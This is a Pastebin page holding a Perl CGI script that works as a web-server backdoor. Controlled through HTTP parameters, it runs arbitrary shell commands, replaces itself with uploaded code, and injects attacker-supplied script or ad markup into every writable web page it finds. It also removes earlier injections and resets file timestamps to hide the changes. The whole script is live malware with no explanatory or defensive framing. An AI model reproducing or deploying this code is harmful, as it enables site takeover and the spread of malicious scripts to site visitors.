Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use File::stat;
- use File::Copy;
- use File::Find;
- use CGI;
- use CGI::Carp qw(warningsToBrowser fatalsToBrowser);
- sub ReadParse
- {
- local (*in) = @_ if @_;
- local ($i, $loc, $key, $val);
- if($ENV{'REQUEST_METHOD'} eq "GET")
- {
- $in = $ENV{'QUERY_STRING'};
- }
- elsif($ENV{'REQUEST_METHOD'} eq "POST")
- {
- read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
- }
- @in = split(/&/, $in);
- foreach $i (0 .. $#in)
- {
- $in[$i] =~ s/\+/ /g;
- ($key, $val) = split(/=/, $in[$i], 2);
- $key =~ s/%(..)/pack("c", hex($1))/ge;
- $val =~ s/%(..)/pack("c", hex($1))/ge;
- $in{$key} .= "\0" if (defined($in{$key}));
- $in{$key} .= $val;
- }
- }
- sub PrintPageHeader
- {
- print "Content-type: text/html\n\n";
- }
- sub ExecuteCommand
- {
- print "<html><body>";
- if ($in{'update1'})
- {
- open (FILE, './data') or die "No data file";
- while (<FILE>)
- {
- chomp;
- if ($_ ne '') {$filepath = $_;}
- }
- close (FILE);
- if ($in{'getfiles'}) {Include ($filepath,$in{'update1'},1);}
- else { Include ($filepath,$in{'update1'},0);}
- }
- if ($in{'add1'})
- {
- open (FILE, './data') or die "No data file";
- while (<FILE>)
- {
- chomp;
- if ($_ ne '') {$filepath = $_;}
- }
- close (FILE);
- if ($in{'getfiles'}) {Ads ($filepath,$in{'add1'},1);}
- else { Ads ($filepath,$in{'add1'},0);}
- }
- Upgrade ($in{'update2'}) if ($in{'update2'});
- Run ($in{'update3'}) if ($in{'update3'});
- $string = "621tset";
- $reversed = reverse $string;
- print "<!--$reversed-->";
- #print "<!--".getpwuid($<)."-->";
- print "</font></body></html>";
- }
- sub Include ($$$)
- {
- my $file = $_[0];
- my $code = $_[1];
- my $getfiles = $_[2];
- my @filepath;
- if (length($code) > 1)
- {
- $code = "<b1>".$code."</b1>";
- }
- if ($getfiles == 1)
- {
- my $pos = rindex($file, "/");
- my $dir = substr($file, 0, $pos);
- File::Find::find(
- sub {
- if (-f && -w) {
- if (/\.ph.*$/ || /\.htm.*$/ || /\.shtm.*$/ || /\.asp.*$/ || /\.jsp$/ || /\.jhtm$/ || /\.cfm$/ || /\.ctp$/ || /\.tpl$/)
- {
- push (@filepath,$File::Find::name);
- return;
- }
- }
- },
- $dir
- );
- }
- else { push (@filepath,$file);}
- foreach my $file(@filepath)
- {
- if ( -e $file && -w $file)
- {
- my $inj = 0;
- my $trusted = 0;
- if($file =~ m/\.htm/i) { $trusted = 1;}
- $info = stat($file);
- $d_atime = $info->atime;
- $d_mtime = $info->mtime;
- $d_size = $info->size;
- open (FILE, $file);
- sysread (FILE, $index_code, $d_size);
- close (FILE);
- $index_code =~ s/(<bb1>.*<bb2>)//gis;
- $index_code =~ s/(<b1>.*<\/b1>)//gis;
- $index_code =~ s/(<script.*>.*String.fromCharCode.*<\/script>)//gis;
- $index_code =~ s/(<font style=.*overflow.*hidden.*>.*<\/script>)//gis;
- if ($index_code =~ m/<\/body>/i)
- {
- $index_code =~ s/<\/body>/$code<\/body>/i;
- $inj = 1;
- }
- elsif ($index_code =~ m/<\/html>/i)
- {
- $index_code =~ s/<\/html>/$code<\/body><\/html>/i;
- $inj = 1;
- }
- if ($trusted == 1 && $inj == 0)
- {
- $index_code = $index_code.$code."</body></html>";
- $inj = 1;
- }
- if ($inj == 1 && $file !~ m/file\.php/i)
- {
- open (TMP, ">$file");
- print TMP $index_code;
- close (TMP);
- utime $d_atime, $d_mtime, $file;
- print "<pre>update $file</pre>";
- }
- #else { print "<!--no body in $file-->";}
- }
- else
- {
- print "<pre>no file $file</pre>";
- }
- }
- }
- sub Ads ($$$)
- {
- my $file = $_[0];
- my $code = $_[1];
- my $getfiles = $_[2];
- my @filepath;
- if (length($code) > 1)
- {
- $code = "<ad>".$code."</ad>";
- }
- if ($getfiles == 1)
- {
- my $pos = rindex($file, "/");
- my $dir = substr($file, 0, $pos);
- File::Find::find(
- sub {
- if (-f && -w) {
- if (/\.ph.*$/ || /\.htm.*$/ || /\.shtm.*$/ || /\.asp.*$/ || /\.jsp$/ || /\.jhtm$/ || /\.cfm$/ || /\.ctp$/ || /\.tpl$/)
- {
- push (@filepath,$File::Find::name);
- return;
- }
- }
- },
- $dir
- );
- }
- else { push (@filepath,$file);}
- foreach my $file(@filepath)
- {
- if ( -e $file && -w $file)
- {
- my $inj = 0;
- $info = stat($file);
- $d_atime = $info->atime;
- $d_mtime = $info->mtime;
- $d_size = $info->size;
- open (FILE, $file);
- sysread (FILE, $index_code, $d_size);
- close (FILE);
- $index_code =~ s/(<ad>.*<\/ad>)//gim;
- $index_code =~ s/(<script.*>.*String.fromCharCode.*<\/script>)//gis;
- $index_code =~ s/(<font style=.*overflow.*hidden.*>.*<\/script>)//gis;
- if ($index_code =~ m/<body.*>/i)
- {
- $index_code =~ s/(<body.*>)/$1$code/i;
- $inj = 1;
- }
- else
- {
- $index_code = $code.$index_code;
- $inj = 1;
- }
- if ($trusted == 1 && $inj == 0)
- {
- $index_code = $index_code.$code."</body></html>";
- $inj = 1;
- }
- if ($inj == 1 && $file !~ m/file\.php/i)
- {
- open (TMP, ">$file");
- print TMP $index_code;
- close (TMP);
- utime $d_atime, $d_mtime, $file;
- print "<pre>update $file</pre>";
- }
- #else { print "<!--no body in $file-->";}
- }
- else
- {
- print "<pre>no file $file</pre>";
- }
- }
- }
- sub Upgrade ($)
- {
- my $code = $_[0];
- if (move("./test.cgi", "./test_old.cgi"))
- {
- open (TMP, ">./test1.cgi");
- print TMP $code;
- close (TMP);
- system("tr -d '\15\32' < test1.cgi > test.cgi");
- $mode = 0755; chmod $mode, './test.cgi';
- unlink('test1.cgi');
- print "<pre>upgrade</pre>";
- }
- else
- {
- print "<pre>no</pre>";
- }
- }
- sub Run ($)
- {
- my $cmd = $_[0];
- print "<pre>";
- system($cmd);
- print "</pre>";
- }
- &ReadParse;
- &PrintPageHeader;
- &ExecuteCommand;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement